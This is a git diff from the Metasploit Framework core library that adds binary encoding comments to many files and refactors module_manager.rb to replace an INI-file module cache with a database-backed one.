diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb
index ce5093c9ec..5ed09db4fc 100644
--- a/lib/msf/core/module.rb
+++ b/lib/msf/core/module.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/module/author.rb b/lib/msf/core/module/author.rb
index d13e2ed410..05265a6bbe 100644
--- a/lib/msf/core/module/author.rb
+++ b/lib/msf/core/module/author.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/module/author.rb.ut.rb b/lib/msf/core/module/author.rb.ut.rb
index 207d4c96ad..89785a4d67 100644
--- a/lib/msf/core/module/author.rb.ut.rb
+++ b/lib/msf/core/module/author.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/module/auxiliary_action.rb b/lib/msf/core/module/auxiliary_action.rb
index 44ee3fb83b..55086aa190 100644
--- a/lib/msf/core/module/auxiliary_action.rb
+++ b/lib/msf/core/module/auxiliary_action.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/module/has_actions.rb b/lib/msf/core/module/has_actions.rb
index 6fda586005..9745ae1c47 100644
--- a/lib/msf/core/module/has_actions.rb
+++ b/lib/msf/core/module/has_actions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/module/auxiliary_action'
module Msf::Module::HasActions
diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb
index e1a29847a5..89f29ae7e2 100644
--- a/lib/msf/core/module/platform.rb
+++ b/lib/msf/core/module/platform.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'abbrev'
#
diff --git a/lib/msf/core/module/platform_list.rb b/lib/msf/core/module/platform_list.rb
index a899854855..64fa68fe61 100644
--- a/lib/msf/core/module/platform_list.rb
+++ b/lib/msf/core/module/platform_list.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# This is a helper to a easy way to specify support platforms. It will take a
diff --git a/lib/msf/core/module/platform_list.rb.ut.rb b/lib/msf/core/module/platform_list.rb.ut.rb
index 0f519f7918..d12854830d 100644
--- a/lib/msf/core/module/platform_list.rb.ut.rb
+++ b/lib/msf/core/module/platform_list.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/module/reference.rb b/lib/msf/core/module/reference.rb
index a6ff76be81..55581dc69e 100644
--- a/lib/msf/core/module/reference.rb
+++ b/lib/msf/core/module/reference.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/module/reference.rb.ut.rb b/lib/msf/core/module/reference.rb.ut.rb
index bd59184dc1..93936dfe13 100644
--- a/lib/msf/core/module/reference.rb.ut.rb
+++ b/lib/msf/core/module/reference.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/module/target.rb b/lib/msf/core/module/target.rb
index dfc4409e3c..95b60315a0 100644
--- a/lib/msf/core/module/target.rb
+++ b/lib/msf/core/module/target.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/module/target.rb.ut.rb b/lib/msf/core/module/target.rb.ut.rb
index 2b5c79f612..5ed119bbe3 100644
--- a/lib/msf/core/module/target.rb.ut.rb
+++ b/lib/msf/core/module/target.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/module_manager.rb b/lib/msf/core/module_manager.rb
index 29e2139998..1b30a31e29 100644
--- a/lib/msf/core/module_manager.rb
+++ b/lib/msf/core/module_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'fastlib'
require 'pathname'
@@ -64,11 +65,6 @@ class ModuleSet < Hash
#
def create(name)
- # if (mod_ambiguous[name])
- # raise Rex::AmbiguousArgumentError.new(name),
- # "The module name #{name} is ambiguous.", caller
- # end
-
klass = get_hash_val(name)
instance = nil
@@ -79,15 +75,19 @@ class ModuleSet < Hash
# type's demand loading until we find one that works for us.
if (module_type.nil?)
MODULE_TYPES.each { |type|
- framework.modules.demand_load_module(type + '/' + name)
+ framework.modules.demand_load_module(type, name)
}
else
- framework.modules.demand_load_module(module_type + '/' + name)
+ framework.modules.demand_load_module(module_type, name)
end
+ recalculate
+
klass = get_hash_val(name)
end
+
+
# If the klass is valid for this name, try to create it
if (klass and klass != SymbolicModule)
instance = klass.new
@@ -105,9 +105,7 @@ class ModuleSet < Hash
# Checks to see if the supplied module name is valid.
#
def valid?(name)
- # If we're using cache, then we need to pre-create an instance of this.
- create(name) if (using_cache)
-
+ create(name)
(self[name]) ? true : false
end
@@ -129,7 +127,7 @@ class ModuleSet < Hash
def each_module(opts = {}, &block)
demand_load_modules
- self.mod_sorted = self.sort if (mod_sorted == nil)
+ self.mod_sorted = self.sort
each_module_list(mod_sorted, opts, &block)
end
@@ -141,7 +139,7 @@ class ModuleSet < Hash
def each_module_ranked(opts = {}, &block)
demand_load_modules
- self.mod_ranked = rank_modules if (mod_ranked == nil)
+ self.mod_ranked = rank_modules
each_module_list(mod_ranked, opts, &block)
end
@@ -288,31 +286,14 @@ protected
self[name] = mod
end
- # Check to see if we should update info
- noup = true if (modinfo and modinfo['noup'])
-
- # Add this module to the module cache for this type
- framework.modules.cache_module(mod) if (noup != true)
-
- # Invalidate the sorted array
- invalidate_sorted_cache
-
- # Return the modlicated instance for use
mod
end
- #
- # Invalidates the sorted and ranked module caches.
- #
- def invalidate_sorted_cache
- mod_sorted = nil
- mod_ranked = nil
- end
-
attr_writer :module_type
attr_accessor :mod_arch_hash, :mod_platform_hash
attr_accessor :mod_sorted, :mod_ranked
attr_accessor :mod_extensions, :mod_ambiguous
+ attr_accessor :module_history
end
@@ -341,20 +322,17 @@ class ModuleManager < ModuleSet
#
def initialize(framework,types=MODULE_TYPES)
self.module_paths = []
- self.module_history = {}
- self.module_history_mtime = {}
self.module_sets = {}
self.module_failed = {}
self.enabled_types = {}
self.framework = framework
+ self.cache = {}
types.each { |type|
init_module_set(type)
}
super(nil)
-
- @modcache_invalidated = false
end
def init_module_set(type)
@@ -447,161 +425,6 @@ class ModuleManager < ModuleSet
return module_failed
end
- ##
- #
- # Module cache management to support demand loaded modules.
- #
- ##
-
- #
- # Sets the path that the module cache information is loaded from and
- # synchronized with. This method should be called prior to loading any
- # modules in order to take advantage of caching information.
- #
- def set_module_cache_file(file_path)
- @modcache_file = file_path
- @modcache = Rex::Parser::Ini.new
-
- begin
- @modcache.from_file(@modcache_file)
- rescue Errno::ENOENT
- @modcache_invalidated = true
- end
-
- # Initialize the standard groups
- @modcache.add_group('FileModificationTimes', false)
-
- MODULE_TYPES.each { |type|
- @modcache.add_group(type, false)
-
- @modcache[type].each_key { |name|
- next if not @modcache[type]
- next if not module_sets[type]
-
- fullname = type + '/' + name
-
- # Make sure the files associated with this module exist. If it
- # doesn't, then we don't create a symbolic module for it. This is
- # to ensure that module counts are accurately reflected after a
- # module is removed or moved.
- next if (@modcache.group?(fullname) == false)
- next if (@modcache[fullname]['FileNames'].nil?)
-
- begin
- @modcache[fullname]['FileNames'].split(',').each { |f|
- File::Stat.new(f)
- }
- rescue Errno::ENOENT
- dlog("File requirement does not exist for #{fullname}", 'core',
- LEV_1);
- next
- end
- module_sets[type][name] = SymbolicModule
- }
- }
-
- end
-
- #
- # Returns true if the module cache is currently being used.
- #
- def using_cache
- (@modcache_invalidated != true)
- end
-
- #
- # Persists the current contents of the module cache to disk.
- #
- def save_module_cache
- if (@modcache)
- @modcache.to_file(@modcache_file)
- end
- end
-
- #
- # Checks to make sure the cache state is okay. If it's not, the cache is
- # cleared and all modules are forced to be loaded. If the cached mtime for
- # the file is the same as the current mtime, then we don't load it until
- # it's needed on demand.
- #
- def check_cache(file)
- # If the module cache has been invalidated, then we return false to
- # indicate that we should go ahead and load the file now.
- return false if (@modcache_invalidated)
-
- if (@modcache and @modcache.group?('FileModificationTimes'))
- no_exist = false
-
- begin
- curr_mtime = File::Stat.new(file).mtime
- rescue Errno::ENOENT
- no_exist = true
- end
-
- if (no_exist or
- @modcache['FileModificationTimes'][file].nil? or
- @modcache['FileModificationTimes'][file].to_s != curr_mtime.to_i.to_s)
- raise ModuleCacheInvalidated, "File #{file} has a new mtime or did not exist"
- end
- end
-
- return true
- end
-
- #
- # Invalidates the current cache.
- #
- def invalidate_cache
- @modcache_invalidated = true
-
- # Clear the module cache.
- if (@modcache)
- @modcache['FileModificationTimes'].clear
-
- MODULE_TYPES.each { |type|
- @modcache[type].clear
- }
- end
- end
-
- #
- # Synchronizes the module cache information
- #
- def update_module_cache_info(fullname, mod, modinfo)
- return if (modinfo and modinfo['noup'] == true)
-
- if (@modcache)
- if (fullname)
- @modcache.add_group(fullname)
- @modcache[fullname].clear
- @modcache[fullname]['FileNames'] = modinfo['files'].join(',')
- @modcache[fullname]['FilePaths'] = modinfo['paths'].join(',')
- @modcache[fullname]['Type'] = modinfo['type']
-
-
- # Deep cache classes (ignore payloads)
- # if(mod.class == ::Class and mod.cached?)
- # @modcache[fullname]['CacheData'] = [Marshal.dump(mod.infos)].pack("m").gsub(/\s+/, '')
- # end
-
- end
-
- modinfo['files'].each do |f|
- begin
- @modcache['FileModificationTimes'][f] = File::Stat.new(f).mtime.to_i.to_s
- rescue Errno::ENOENT
- end
- end
- end
- end
-
- #
- # Caches this module under a specific module type and name
- #
- def cache_module(mod)
- @modcache[mod.type][mod.refname] = 1
- end
-
##
#
# Module path management
@@ -609,63 +432,46 @@ class ModuleManager < ModuleSet
##
#
- # Adds a path to be searched for new modules. If check_cache is false,
- # all modules in the specified path will be demand loaded. Furthermore,
- # their loading will not impact the module path.
+ # Adds a path to be searched for new modules.
#
- def add_module_path(path, check_cache = true)
- epaths = []
-
+ def add_module_path(path)
+ npaths = []
+
if path =~ /\.fastlib$/
unless ::File.exist?(path)
raise RuntimeError, "The path supplied does not exist", caller
end
+ npaths << ::File.expand_path(path)
else
path.sub!(/#{File::SEPARATOR}$/, '')
# Make the path completely canonical
path = Pathname.new(File.expand_path(path))
- # Make sure the path is a valid directory before we try to rock the
- # house
+ # Make sure the path is a valid directory
unless path.directory?
raise RuntimeError, "The path supplied is not a valid directory.", caller
end
# Now that we've confirmed it exists, get the full, cononical path
- path = path.realpath.to_s
+ path = ::File.expand_path(path)
+ npaths << path
# Identify any fastlib archives inside of this path
Dir["#{path}/**/*.fastlib"].each do |fp|
- epaths << fp
+ npaths << fp
end
end
- module_paths << path
-
- epaths.each do |epath|
- module_paths << epath
- end
-
- begin
- counts = load_modules(path, !check_cache)
- rescue ModuleCacheInvalidated
- invalidate_cache
-
- # Re-load all the modules now that the cache has been invalidated
- module_paths.each { |p|
- counts = load_modules(p, true)
- }
- end
-
- # Synchronize the module cache if the module cache is not being used.
- # We only do this if the caller wanted us to check the cache in the
- # first place. By default, check_cache will be true. One scenario
- # where it will be false is from the loadpath command in msfconsole.
- if !using_cache and check_cache
- save_module_cache
- end
-
+ # Update the module paths appropriately
+ self.module_paths = (module_paths + npaths).flatten.uniq
+
+ # Load all of the modules from the new paths
+ counts = nil
+ npaths.each { |d|
+ counts = load_modules(d, false)
+ }
+
return counts
end
@@ -674,6 +480,7 @@ class ModuleManager < ModuleSet
#
def remove_module_path(path)
module_paths.delete(path)
+ module_paths.delete(::File.expand_path(path))
end
def register_type_extension(type, ext)
@@ -683,10 +490,8 @@ class ModuleManager < ModuleSet
# Reloads modules from all module paths
#
def reload_modules
- invalidate_cache
self.module_history = {}
- self.module_history_mtime = {}
self.clear
self.enabled_types.each_key do |type|
@@ -694,11 +499,17 @@ class ModuleManager < ModuleSet
init_module_set(type)
end
+ # The number of loaded modules in the following categories:
+ # auxiliary/encoder/exploit/nop/payload/post
+ count = 0
module_paths.each do |path|
- counts = load_modules(path, true)
+ mods = load_modules(path, true)
+ mods.each_value {|c| count += c}
end
- save_module_cache
+ rebuild_cache
+
+ count
end
#
@@ -765,10 +576,8 @@ class ModuleManager < ModuleSet
return nil
end
-
self.module_failed.delete(mod.file_path)
-
# Remove the original reference to this module
self.delete(mod.refname)
@@ -786,10 +595,12 @@ class ModuleManager < ModuleSet
end
# Let the specific module sets have an opportunity to handle the fact
- # that this module was reloaded. For instance, the payload module set
- # will need to flush the blob cache entry associated with this module
+ # that this module was reloaded.
module_sets[mod.type].on_module_reload(mod)
+ # Rebuild the cache for just this module
+ rebuild_cache(mod)
+
mod
end
@@ -802,12 +613,6 @@ class ModuleManager < ModuleSet
# Call the module set implementation of add_module
dup = super
- # If the module cache is not being used, update the cache with
- # information about the files that are associated with this module.
- if (!using_cache)
- update_module_cache_info(dup.fullname, mod, file_paths)
- end
-
# Automatically subscribe a wrapper around this module to the necessary
# event providers based on whatever events it wishes to receive. We
# only do this if we are the module manager instance, as individual
@@ -818,33 +623,6 @@ class ModuleManager < ModuleSet
framework.events.on_module_load(name, dup)
end
- #
- # Loads the files associated with a module and recalculates module
- # associations.
- #
- def demand_load_module(fullname)
- dlog("Demand loading module #{fullname}.", 'core', LEV_1)
-
- return nil if (@modcache.group?(fullname) == false)
- return nil if (@modcache[fullname]['FileNames'].nil?)
- return nil if (@modcache[fullname]['FilePaths'].nil?)
-
- type = fullname.split(/\//)[0]
- files = @modcache[fullname]['FileNames'].split(',')
- paths = @modcache[fullname]['FilePaths'].split(',')
-
- files.each_with_index { |file, idx|
- dlog("Loading from file #{file}", 'core', LEV_2)
-
- load_module_from_file(paths[idx], file, nil, nil, nil, true)
- }
-
- if (module_sets[type].postpone_recalc != true)
- module_sets[type].recalculate
- end
- end
-
-
#
# Provide a list of the types of modules in the set
#
@@ -866,6 +644,90 @@ class ModuleManager < ModuleSet
::File.read(file, ::File.size(file))
end
+ #
+ # Rebuild the cache for the module set
+ #
+ def rebuild_cache(mod = nil)
+ return if not (framework.db and framework.db.migrated)
+ if mod
+ framework.db.update_module_details(mod)
+ else
+ framework.db.update_all_module_details
+ end
+ refresh_cache
+ end
+
+ #
+ # Return a listing of all cached modules
+ #
+ def cache_entries
+ return {} if not (framework.db and framework.db.migrated)
+ res = {}
+ ::Mdm::ModuleDetail.find(:all).each do |m|
+ res[m.file] = { :mtype => m.mtype, :refname => m.refname, :file => m.file, :mtime => m.mtime }
+ unless module_set(m.mtype).has_key?(m.refname)
+ module_set(m.mtype)[m.refname] = SymbolicModule
+ end
+ end
+
+ res
+ end
+
+ #
+ # Reset the module cache
+ #
+ def refresh_cache
+ self.cache = cache_entries
+ end
+
+ def has_module_file_changed?(file)
+ begin
+ cfile = self.cache[file]
+ return true if not cfile
+
+ # Payloads can't be cached due to stage/stager matching
+ return true if cfile[:mtype] == "payload"
+ return cfile[:mtime].to_i != ::File.mtime(file).to_i
+ rescue ::Errno::ENOENT
+ return true
+ end
+ end
+
+ def has_archive_file_changed?(arch, file)
+ begin
+ cfile = self.cache[file]
+ return true if not cfile
+
+ # Payloads can't be cached due to stage/stager matching
+ return true if cfile[:mtype] == "payload"
+
+ return cfile[:mtime].to_i != ::File.mtime(file).to_i
+ rescue ::Errno::ENOENT
+ return true
+ end
+ end
+
+ def demand_load_module(mtype, mname)
+ n = self.cache.keys.select { |k|
+ self.cache[k][:mtype] == mtype and
+ self.cache[k][:refname] == mname
+ }.first
+
+ return nil unless n
+ m = self.cache[n]
+
+ path = nil
+ if m[:file] =~ /^(.*)\/#{m[:mtype]}s?\//
+ path = $1
+ load_module_from_file(path, m[:file], nil, nil, nil, true)
+ else
+ dlog("Could not demand load module #{mtype}/#{mname} (unknown base name in #{m[:file]})", 'core', LEV_2)
+ nil
+ end
+ end
+
+ attr_accessor :cache # :nodoc:
+
protected
@@ -910,17 +772,15 @@ protected
next if (file =~ /rb\.(ut|ts)\.rb$/)
# Skip files with a leading period
- next if file[0,1] =="."
+ next if file[0,1] == "."
load_module_from_file(bpath, file, loaded, recalc, counts, demand)
end
end
- # Perform any required recalculations for the individual module types
- # that actually had load changes
- recalc.each_key { |key|
- module_sets[key].recalculate
- }
+ recalc.each_key do |mtype|
+ module_set(mtype).recalculate
+ end
# Return per-module loaded counts
return counts
@@ -954,16 +814,14 @@ protected
next if (ent =~ /rb\.(ut|ts)\.rb$/)
# Skip files with a leading period
- next if ent[0,1] =="."
+ next if ent[0,1] == "."
load_module_from_archive(bpath, ent, loaded, recalc, counts, demand)
end
- # Perform any required recalculations for the individual module types
- # that actually had load changes
- recalc.each_key { |key|
- module_sets[key].recalculate
- }
+ recalc.each_key do |mtype|
+ module_set(mtype).recalculate
+ end
# Return per-module loaded counts
return counts
@@ -974,10 +832,7 @@ protected
#
def load_module_from_file(path, file, loaded, recalc, counts, demand = false)
-
- # If the file on disk hasn't changed with what we have stored in the
- # cache, then there's no sense in loading it
- if (!has_module_file_changed?(file))
+ if not ( demand or has_module_file_changed?(file))
dlog("Cached module from file #{file} has not changed.", 'core', LEV_2)
return false
end
@@ -1061,12 +916,6 @@ protected
elog("Exception caught during is_usable check: #{$!}")
end
- # Synchronize the modification time for this file.
- update_module_cache_info(nil, added, {
- 'paths' => [ path ],
- 'files' => [ file ],
- 'type' => type}) if (!using_cache)
-
if (usable == false)
ilog("Skipping module in #{file} because is_usable returned false.", 'core', LEV_1)
return false
@@ -1088,10 +937,6 @@ protected
# Append the added module to the hash of file->module
loaded[file] = added if (loaded)
- # Track module load history for future reference
- module_history[file] = added
- module_history_mtime[file] = File::Stat.new(file).mtime.to_i
-
# The number of loaded modules this round
if (counts)
counts[type] = (counts[type]) ? (counts[type] + 1) : 1
@@ -1105,6 +950,11 @@ protected
# Loads a module from the supplied archive path
#
def load_module_from_archive(path, file, loaded, recalc, counts, demand = false)
+
+ if not ( demand or has_archive_module_file_changed?(file))
+ dlog("Cached module from file #{file} has not changed.", 'core', LEV_2)
+ return false
+ end
# Derive the name from the path with the exclusion of the .rb
name = file.match(/^(.+?)#{File::SEPARATOR}(.*)(.rb?)$/)[2]
@@ -1181,12 +1031,6 @@ protected
elog("Exception caught during is_usable check: #{$!}")
end
- # Synchronize the modification time for this file.
- update_module_cache_info(nil, added, {
- 'paths' => [ path ],
- 'files' => [ file ],
- 'type' => type}) if (!using_cache)
-
if (usable == false)
ilog("Skipping module in #{path}::#{file} because is_usable returned false.", 'core', LEV_1)
return false
@@ -1208,10 +1052,6 @@ protected
# Append the added module to the hash of file->module
loaded[file] = added if (loaded)
- # Track module load history for future reference
- module_history[file] = added
- module_history_mtime[file] = ::Time.now.to_i
-
# The number of loaded modules this round
if (counts)
counts[type] = (counts[type]) ? (counts[type] + 1) : 1
@@ -1220,17 +1060,6 @@ protected
return true
end
- #
- # Checks to see if the supplied file has changed (if it's even in the
- # cache).
- #
- def has_module_file_changed?(file)
- begin
- return (module_history_mtime[file] != File::Stat.new(file).mtime.to_i)
- rescue Errno::ENOENT
- return true
- end
- end
#
# Called when a module is initially loaded such that it can be
@@ -1244,7 +1073,7 @@ protected
# off to a special payload set. The payload set, in turn, will
# automatically create all the permutations after all the payload
# modules have been loaded.
-
+
if (type != MODULE_PAYLOAD)
# Add the module class to the list of modules and add it to the
# type separated set of module classes
@@ -1289,7 +1118,6 @@ protected
attr_accessor :modules, :module_sets # :nodoc:
attr_accessor :module_paths # :nodoc:
- attr_accessor :module_history, :module_history_mtime # :nodoc:
attr_accessor :module_failed # :nodoc:
attr_accessor :enabled_types # :nodoc:
diff --git a/lib/msf/core/nop.rb b/lib/msf/core/nop.rb
index 40836b2511..b2d98b3880 100644
--- a/lib/msf/core/nop.rb
+++ b/lib/msf/core/nop.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/option_container.rb b/lib/msf/core/option_container.rb
index 0c0bb9ba5a..f3c9e61051 100644
--- a/lib/msf/core/option_container.rb
+++ b/lib/msf/core/option_container.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'resolv'
require 'msf/core'
require 'rex/socket'
diff --git a/lib/msf/core/option_container.rb.ut.rb b/lib/msf/core/option_container.rb.ut.rb
index 641c8ef837..f146b94cc7 100644
--- a/lib/msf/core/option_container.rb.ut.rb
+++ b/lib/msf/core/option_container.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/msf/core/patches/active_record.rb b/lib/msf/core/patches/active_record.rb
index d02e2cf3b8..6e8fa74070 100644
--- a/lib/msf/core/patches/active_record.rb
+++ b/lib/msf/core/patches/active_record.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module ActiveRecord
module ConnectionAdapters
class ConnectionPool
diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb
index 0d24ba271f..b4154b0717 100644
--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'metasm'
diff --git a/lib/msf/core/payload/aix.rb b/lib/msf/core/payload/aix.rb
index d1eb3fffe7..cc45084a24 100644
--- a/lib/msf/core/payload/aix.rb
+++ b/lib/msf/core/payload/aix.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/bsd.rb b/lib/msf/core/payload/bsd.rb
index 4686eb8f00..a3c930c0a2 100644
--- a/lib/msf/core/payload/bsd.rb
+++ b/lib/msf/core/payload/bsd.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/generic.rb b/lib/msf/core/payload/generic.rb
index 378e6ec8bb..c72cf13bf0 100644
--- a/lib/msf/core/payload/generic.rb
+++ b/lib/msf/core/payload/generic.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/payload/java.rb b/lib/msf/core/payload/java.rb
index d3555f41ff..37e563e6ee 100644
--- a/lib/msf/core/payload/java.rb
+++ b/lib/msf/core/payload/java.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::Java
diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb
index 26e7a1252a..8d1dc9805c 100644
--- a/lib/msf/core/payload/linux.rb
+++ b/lib/msf/core/payload/linux.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/netware.rb b/lib/msf/core/payload/netware.rb
index 7e65c72956..f1bbe99a36 100644
--- a/lib/msf/core/payload/netware.rb
+++ b/lib/msf/core/payload/netware.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/osx.rb b/lib/msf/core/payload/osx.rb
index 915ab64fa0..dc9f89c0f9 100644
--- a/lib/msf/core/payload/osx.rb
+++ b/lib/msf/core/payload/osx.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/osx/bundleinject.rb b/lib/msf/core/payload/osx/bundleinject.rb
index ed227313a3..d327374ea3 100644
--- a/lib/msf/core/payload/osx/bundleinject.rb
+++ b/lib/msf/core/payload/osx/bundleinject.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/payload/php.rb b/lib/msf/core/payload/php.rb
index ab9721f295..e843416fe0 100644
--- a/lib/msf/core/payload/php.rb
+++ b/lib/msf/core/payload/php.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/single.rb b/lib/msf/core/payload/single.rb
index 4ecbd66be4..7a78b489bc 100644
--- a/lib/msf/core/payload/single.rb
+++ b/lib/msf/core/payload/single.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/solaris.rb b/lib/msf/core/payload/solaris.rb
index 2f43a68481..909d0217e9 100644
--- a/lib/msf/core/payload/solaris.rb
+++ b/lib/msf/core/payload/solaris.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb
index e0e951103c..45674bc0f1 100644
--- a/lib/msf/core/payload/stager.rb
+++ b/lib/msf/core/payload/stager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb
index 7ca61ba62f..64f5914f02 100644
--- a/lib/msf/core/payload/windows.rb
+++ b/lib/msf/core/payload/windows.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/payload/windows/dllinject.rb b/lib/msf/core/payload/windows/dllinject.rb
index f98bbc2aa3..99d193adf4 100644
--- a/lib/msf/core/payload/windows/dllinject.rb
+++ b/lib/msf/core/payload/windows/dllinject.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/payload/windows/exec.rb b/lib/msf/core/payload/windows/exec.rb
index ff38b50fb5..5ad8a42568 100644
--- a/lib/msf/core/payload/windows/exec.rb
+++ b/lib/msf/core/payload/windows/exec.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/payload/windows/loadlibrary.rb b/lib/msf/core/payload/windows/loadlibrary.rb
index e077716b61..05854d12df 100644
--- a/lib/msf/core/payload/windows/loadlibrary.rb
+++ b/lib/msf/core/payload/windows/loadlibrary.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/payload/windows/reflectivedllinject.rb b/lib/msf/core/payload/windows/reflectivedllinject.rb
index 703d311880..c0e2db1950 100644
--- a/lib/msf/core/payload/windows/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/reflectivedllinject.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'rex/peparsey'
diff --git a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
index 04318e15cc..3e37820d7d 100644
--- a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'rex/peparsey'
diff --git a/lib/msf/core/payload_set.rb b/lib/msf/core/payload_set.rb
index 9e72f6da70..c31a3f94a8 100644
--- a/lib/msf/core/payload_set.rb
+++ b/lib/msf/core/payload_set.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/module_manager'
@@ -179,8 +180,10 @@ class PayloadSet < ModuleSet
# which it is, we add it to the appropriate list.
#
def add_module(pmodule, name, modinfo = nil)
+
if (md = name.match(/^(singles|stagers|stages)#{File::SEPARATOR}(.*)$/))
- name = md[2]
+ ptype = md[1]
+ name = md[2]
end
# Duplicate the Payload base class and extend it with the module
diff --git a/lib/msf/core/plugin.rb b/lib/msf/core/plugin.rb
index f63e75acad..1afe44a62f 100644
--- a/lib/msf/core/plugin.rb
+++ b/lib/msf/core/plugin.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/sync/ref'
module Msf
diff --git a/lib/msf/core/plugin_manager.rb b/lib/msf/core/plugin_manager.rb
index 1e3362b4b1..bae9aabb9e 100644
--- a/lib/msf/core/plugin_manager.rb
+++ b/lib/msf/core/plugin_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/plugin'
module Msf
diff --git a/lib/msf/core/post.rb b/lib/msf/core/post.rb
index 774c11f2b6..af2eadb9f7 100644
--- a/lib/msf/core/post.rb
+++ b/lib/msf/core/post.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/module'
diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb
index d7ea9635de..7e5861bb32 100644
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class Post
diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb
index aaad99965c..558c7d42b8 100644
--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class Post
diff --git a/lib/msf/core/post/linux/priv.rb b/lib/msf/core/post/linux/priv.rb
index 16f0e41dec..78f9c04015 100644
--- a/lib/msf/core/post/linux/priv.rb
+++ b/lib/msf/core/post/linux/priv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/common'
module Msf
diff --git a/lib/msf/core/post/linux/system.rb b/lib/msf/core/post/linux/system.rb
index 33ff68109b..b1f267e718 100644
--- a/lib/msf/core/post/linux/system.rb
+++ b/lib/msf/core/post/linux/system.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/common'
